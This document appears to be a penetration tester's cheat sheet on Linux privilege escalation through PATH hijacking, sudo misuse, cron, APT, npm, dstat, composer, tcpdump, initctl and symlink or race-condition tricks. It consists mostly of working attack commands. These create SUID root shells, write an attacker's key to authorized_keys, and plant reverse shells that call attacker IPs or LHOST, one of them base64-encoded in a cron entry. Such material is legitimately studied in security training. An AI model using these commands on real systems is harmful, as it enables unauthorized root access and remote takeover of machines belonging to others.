Hijacks

When a SUID binary calls an external command without using its absolute path (e.g., cat instead of /bin/cat), the system searches for the executable in directories listed in $PATH, in order. This allows an attacker to inject a malicious executable that gets executed with elevated privileges.

Identify the vulnerability:

• Find a SUID binary that calls external commands

• Use strings or ltrace to check if commands are called without absolute paths

Check current PATH:

Check $PATH

echo $PATH

Hijack the PATH:

Prepend a writable directory to $PATH

export PATH=/tmp:$PATH

Create malicious executable:

Use the same name as the command the binary calls

echo '#!/bin/bash' > /tmp/cat
echo 'id' >> /tmp/cat
chmod +x /tmp/cat

Escalate to root shell:

Create a SUID bash shell:

echo 'cp /bin/bash /tmp/rootshell; chown root:root /tmp/rootshell; chmod 4777 /tmp/rootshell' > /tmp/cat

Create a hijacked bash script

echo -e '#!/bin/bash\n\ncp /bin/bash /tmp/tokyo\nchown root:root /tmp/tokyo\nchmod 6777 /tmp/tokyo' | tee HIJACKED.sh

Launch the shell with -p flag to preserve privileges:

/tmp/rootshell -p

Path Hijacking interactive shell

If there is a writable directory in the $PATH (e.g., /tmp or /home/user/) that is checked before system directories when running sudo, and an attacker can control the contents of this directory.

Copy bash to the writable directory:

cd /var/tmp && cp /bin/bash .

sudo -i

Path Hijacking php

If is possible to use php with sudo

sudo /usr/bin/php -r 'system("/bin/sh");'

PHP File

Copy the shell

<?php
define('PATH', '/PATH/HIJACK');
system('cp /bin/bash /tmp/tokyo; chown root:root /tmp/tokyo; chmod 6777 /tmp/tokyo;');
?>

Execute the shell

/tmp/tokyo -p

Path Hijacking cron

• When PATH includes /usr/local/bin before /usr/bin in the cron job's environment.

• When a binary or script is executed without an absolute path.

Copy the shell

echo -e '#!/bin/bash\n\ncp /bin/bash /tmp/tokyo\nchmod u+s /tmp/tokyo' > /usr/local/bin/TARGET; chmod +x /usr/local/bin/TARGET

• bash drops SUID privileges by default, so make sure to run it with -p to keep root:

tokyo -p

PHP

Reverse shell

$sock=fsockopen("10.10.16.8", 4445);
exec("/bin/sh -i <&3 >&3 2>&3");

Copy the shell

<?php
$bashPath = '/bin/bash';
$tokyoPath = '/tmp/tokyo'; 

exec("cp $bashPath $tokyoPath");
exec("chmod u+s $tokyoPath");
exec("chmod +x $tokyoPath");
?>

Reverse shell template

echo "* * * * * root echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjAuMC4zLzcwMjAgMD4mMQo= | base64 -d | bash" > clean

base64 the shell

echo "bash -i >& /dev/tcp/172.20.0.3/7020 0>&1" | base64

Path Hijacking supervisord.pid

• Process management tool for keeping services running.

• Each managed process must have a [program:<name>] line followed by another line command= where you should place the payload.

POC

echo -e "[program:memcached]\ncommand = bash -c 'bash -i  >& /dev/tcp/LHOST/PORT 0>&1'" > memcached.ini

Path Hijacking Python

Python prioritize modules within the vulnerable script's directory, so you could place the malicious module there

python PATH order

python -c 'import sys; print "\n".join(sys.path)'

Look for writable modules

find /usr/lib/python* -type f -writable -ls 2>&1 | grep python

Look in virtual environments

find /path/to/venv -type f -writable -ls 2>&1 | grep python

Look in the entire system

find -type f -writable -ls 2>&1 | grep python

Malicious Module Poc

import pty

pty.spawn("/bin/bash")

Reverse Shell

echo 'import pty
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.16.6",4444))
dup2(s.fileno(),0)
dup2(s.fileno(),1)
dup2(s.fileno(),2)
pty.spawn("/bin/bash")
s.close()' >> os.py

Path Hijacking symlink

ln -s /root/root.txt t.trace.db

tar wildcards

Move the directory being use by the script:

mv development{,.orig}

Replace it with a symbolic link pointing to your target directory:

ln -s /root development

Decompress the content:

tar xvf file.tar.gz -C /tmp/

Sudoedit Double Wildcard Exploit

• Using this exploit is possible to create a symbolic link pointing to the authorized_keys file.

First create a new directory in the vulnerable path:

 mkdir tokyo

Now, from the new directory pop the symbolic link:

 ln -s /home/alekos/.ssh/authorized_keys layout.html

Finally use sudoedit to write your public key:

sudoedit -u alekos /var/www/testing/tokyo/layout.html

TOCTOU - Time-To-Check-Time-of-Use

• Is a type of race condition where a system checks a resource’s state at one point in time but acts on that state later.

• Between the check and the use, the resource can be altered by an attacker.

Attacker continuously changes a symlink target

while true; do ln -sf /sensitive/file /tmp/vuln_link; done

• The vulnerable script checks /tmp/vuln_link and then uses it, assuming it points to a safe file.

Conditional Logic and Environment Variables

• In some cases, the vulnerable script uses additional logic or environment variables that affect whether the resource is read or acted upon after the initial check.

• This can require more sophisticated exploitation, such as using a double symlink or toggling environment variables to bypass checks.

Step 1: Create a symlink that passes the check

ln -s /safe/path /tmp/vuln_link

Step 2: Vulnerable script moves the symlink to quarantine after check

Step 3: Attacker runs in parallel, swapping symlink target to sensitive file

while true; do ln -sf /sensitive/file /var/quarantined/vuln_link; done

Step 4: Attacker sets environment variable to trigger reading the file

export CHECK_CONTENT=true
sudo vulnerable_script /tmp/vuln_link

Path Hijacking doas

• doas is a lightweight, simple command-line utility for running commands with elevated privileges on Unix-like systems, similar to sudo.

• doas.conf have important information for privilege escalation:

find / -name "doas.conf" 2>/dev/null

Path Hijacking APT

Pre-Invoke

• Create a malicious config file to be invoked before APT runs:

echo 'APT::Update::Pre-Invoke {"bash -c '\''bash -i >& /dev/tcp/192.168.0.10/4433 0>&1'\''"}' > file_name

• APT check this directory for pre-invoke scripts:

/etc/apt/apt.conf.d

• Just wait for listener.

Path Hijacking npm

• A NodeJS package is defined in a file package.json, is possible to create a malicious package and run it with the --unsafe option to get code execution:

{
  "name": "root_please",
  "version": "1.0.0",
  "scripts": {
    "preinstall": "/bin/bash"
  }
}

• The malicious package.json needs to be contain within the fake package directory; once is all setup just run it with sudo:

sudo npm i package/ --unsafe

dstatPlugin poisoning

Allows to run arbitrary python scripts loaded as “external plugins” if they are located in one of the directories stated in the man page:

• ~/.dstat/

• (path of binary)/plugins/

• /usr/share/dstat/

• /usr/local/share/dstat

Normally to escalate privilege you want to choose the ones within the root path, check for writable permissions:

ls -ld /usr/local/share/dstat/
ls -ld /usr/share/dstat/

Create a malicious plugin:

echo -e 'import os\n\nos.system("/bin/bash")' > /usr/local/share/dstat/dstat_tokyo.py
echo 'import os; os.execv("/bin/sh", ["sh"])' > ~/.dstat/dstat_tokyo.py

Execute it with --PluginName:

doas /usr/bin/dstat --tokyo
sudo dstat --tokyo

Path Hijacking Composer

• First create the temporal folder where you will invoke the shell from and save in an environmental variable:

TF=$(mktemp -d)

• Once is done, create the malicious script to feed composer:

echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json

• Finally, just execute the script with it's in-build option:

sudo composer --working-dir=$TF run-script x

Path Hijacking GitPython

CVE-2022-24439

• Inadequate validation of user input when handling remote URLs passed to the clone command:

Create the reverse shell

echo "bash -i >& /dev/tcp/10.10.16.10/4444 0>&1" > /tmp/shell.sh

Payload

sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py 'ext::sh -c bash% /tmp/shell.sh'

Path Hijacking Mosh

if It's possible to use /usr/bin/mosh-server with sudo privileges

Start mosh-server as root and note the key and port

sudo -u root /usr/bin/mosh-server 0.0.0.0

Export the key

export MOSH_KEY=0NJo6yv0XHnF7Wrj8Y5pQ

Connect to the session

mosh-client 127.0.0.1 60001

Path Hijacking tcpdumb

There is a GTFOBin entry for tcpdump

COMMAND='cp /bin/bash /tmp/tokyo; chmod 6777 /tmp/tokyo'

TF=$(mktemp)

echo "$COMMAND" > $TF

chmod +x $TF

sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF -Z root

Now, looking at the /tmp folder, we see that we have successfully created a copy of /bin/bash as /tmp/bash_root

/tmp/tokyo -p

Path Hijacking initctl

• If is possible to use initclt with sudo and write Service Configuration Files you could create and start malicious services.

Find writable service configs

find /etc/init/ -writable -type f

Malicious Service Configuration

Add this to the vulnerable .conf file

start on pwn
task
exec python -c 'import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.21",4321));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Then, just trigger the event:

Method 1: Manual event trigger

sudo initctl emit pwn

Method 2: Replace existing service

sudo initctl stop existing-service
sudo initctl start existing-service